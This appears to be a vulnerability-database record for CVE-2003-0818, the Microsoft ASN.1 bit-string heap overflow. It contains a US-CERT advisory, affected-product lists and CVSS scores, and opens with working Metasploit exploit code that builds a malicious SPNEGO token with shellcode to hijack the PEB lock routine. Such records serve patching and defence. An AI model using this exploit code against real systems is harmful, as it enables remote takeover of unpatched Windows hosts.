print_status("The target system has already been exploited")
else
print_status("Error: #{e}")
end
end
handler
disconnect
end
def exploit_http(token)
connect
req = "GET / HTTP/1.0\r\n"
req << "Host: #{ datastore['RHOST']}\r\n"
req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"
sock.put(req)
res = sock.get_once
if (res and res =~ /0x80090301/)
print_status("This server does not support the Negotiate protocol or has already been exploited")
end
if (res and res =~ /0x80090304/)
print_status("This server responded with error code 0x80090304 (wth?)")
end
handler
disconnect
end
# Returns an ASN.1 encoded string
def enc_asn1(str)
Rex::Proto::SMB::Utils::asn1encode(str)
end
# Returns an ASN.1 encoded bit string with 0 unused bits
def enc_bits(str)
"\x03" + enc_asn1("\x00" + str)
end
# Returns a BER encoded constructed bit string
def enc_constr(*str_arr)
"\x23" + enc_asn1(str_arr.join(''))
end
# Returns a BER encoded SPNEGO token
def spnego_token(stage0, stage1)
if !(stage0 and stage1)
print_status("Invalid parameters passed to spnego_token")
return
end
if (stage0.length > 1032)
print_status("The stage 0 shellcode is longer than 1032 bytes")
return
end
tag = "\x90\x42\x90\x42\x90\x42\x90\x42"
if ((tag.length + stage1.length) > 1033)
print_status("The stage 1 shellcode is too long")
return
end
# The first two overwrites must succeed, so we write to an unused location
# in the PEB block. We don't care about the values, because after this the
# doubly linked list of free blocks is corrupted and we get to the second
# overwrite which is more useful.
fw = "\xf8\x0f\x01\x00" # 0x00010ff8
bk = "\xf8\x0f\x01"
# The second overwrite writes the address of our shellcode into the
# FastPebLockRoutine pointer in the PEB
peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB
bitstring = enc_constr(
enc_bits("A" * 1024),
"\x03\x00",
enc_constr(
enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
enc_constr( enc_bits(fw + bk) ),
enc_constr(
enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
enc_constr(
enc_bits("\xeb\x06" + make_nops(6)),
enc_bits("D" * 1040)
)
)
)
)
token = "\x60" + enc_asn1( # Application Constructed Object
"\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID
"\xa0" + enc_asn1( # NegTokenInit (0xa0)
"\x30" + enc_asn1(
"\xa1" + enc_asn1(
bitstring
)
)
)
)
return token
end
end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Multiple Vulnerabilities in Microsoft ASN.1 Library
Original issue date: February 10, 2004 Last revised: -- Source: US-CERT
A complete revision history is at the end of this document. According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic.
Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.
Solution
Apply a patch
Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007.
Vendor Information
This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.
Microsoft
Please see Microsoft Security Bulletin MS04-007.
References
* Vulnerability Note VU#216324 -
<http://www.kb.cert.org/vuls/id/216324>
* Vulnerability Note VU#583108 -
<http://www.kb.cert.org/vuls/id/583108>
* eEye Digital Security Advisory AD20040210 -
<http://www.eeye.com/html/Research/Advisories/AD20040210.html>
* eEye Digital Security Advisory AD20040210-2 -
<http://www.eeye.com/html/Research/Advisories/AD20040210-2.html>
* Microsoft Security Bulletin MS04-007 -
<http://microsoft.com/technet/security/bulletin/MS04-007.asp>
* Microsoft Knowledge Base Article 252648 -
<http://support.microsoft.com/default.aspx?scid=252648>
_________________________________________________________________
These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document. ___________
Feedback can be directed to the author, Art Manion.
Copyright 2004 Carnegie Mellon University.
Revision History
February 10, 2004: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW 5hU8LQ/oOC4sI8PpnkppCyg= =Oe/N -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200403-0051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "microsoft",
"version": null
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "r2"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "*"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "standard"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "*"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "web"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "enterprise"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "enterprise_64-bit"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1358"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1356"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1355"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1351"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1347"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.5"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.1"
},
{
"model": "windows xp professional sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp professional",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp 64-bit edition version sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows xp 64-bit edition version",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows xp 64-bit edition sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp 64-bit edition",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows server web edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server standard edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server enterprise edition itanium",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "20030"
},
{
"model": "windows server enterprise edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server datacenter edition itanium",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "20030"
},
{
"model": "windows server datacenter edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows nt workstation sp6a",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp6a",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows 98se",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "98"
},
{
"model": "windows server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "quicken",
"scope": "eq",
"trust": 0.9,
"vendor": "intuit",
"version": "2003"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.2.3292"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.1.3036"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.0.2938"
},
{
"model": "windows 2000",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (server)"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (terminal_srv)"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (workstation)"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "none"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.6,
"vendor": "yahoo",
"version": "5.5.1249"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.6,
"vendor": "yahoo",
"version": "5.5"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.2"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.1"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.10"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.00"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.04"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.02"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.02"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.03"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.0"
},
{
"model": "turbotax",
"scope": "eq",
"trust": 0.6,
"vendor": "intuit",
"version": "2003"
},
{
"model": "instant messenger beta",
"scope": "eq",
"trust": 0.6,
"vendor": "aol",
"version": "5.5.3415"
},
{
"model": "xmlspy professional edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy professional edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy home edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy home edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy enterprise edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy enterprise edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "6.0"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "5.0.5"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "5.0"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp1"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "professional"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "server"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "advanced_server"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.8"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.7"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.6"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.5"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.0"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "2.4"
},
{
"model": "small business server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20000"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0"
},
{
"model": "exchange server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "exchange server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:microsoft:windows_2000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_nt",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_xp",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery of this vulnerability has been credited to eEye Digital Security.",
"sources": [
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.6
},
"cve": "CVE-2003-0818",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2003-0818",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2003-0818",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#583108",
"trust": 0.8,
"value": "27.72"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#216324",
"trust": 0.8,
"value": "27.72"
},
{
"author": "NVD",
"id": "CVE-2003-0818",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200403-040",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2003-0818",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. \nThis vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. \nIt should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. \nIssues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. \n** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##\n# $Id$\n##\n\n##\n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit\n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/\n##\n\n\nrequire \u0027msf/core\u0027\n\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\n\tinclude Msf::Exploit::Remote::SMB\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t\u0027Name\u0027 =\u003e \u0027Microsoft ASN.1 Library Bitstring Heap Overflow\u0027,\n\t\t\t\u0027Description\u0027 =\u003e %q{\n\t\t\t\tThis is an exploit for a previously undisclosed\n\t\t\t\tvulnerability in the bit string decoding code in the\n\t\t\t\tMicrosoft 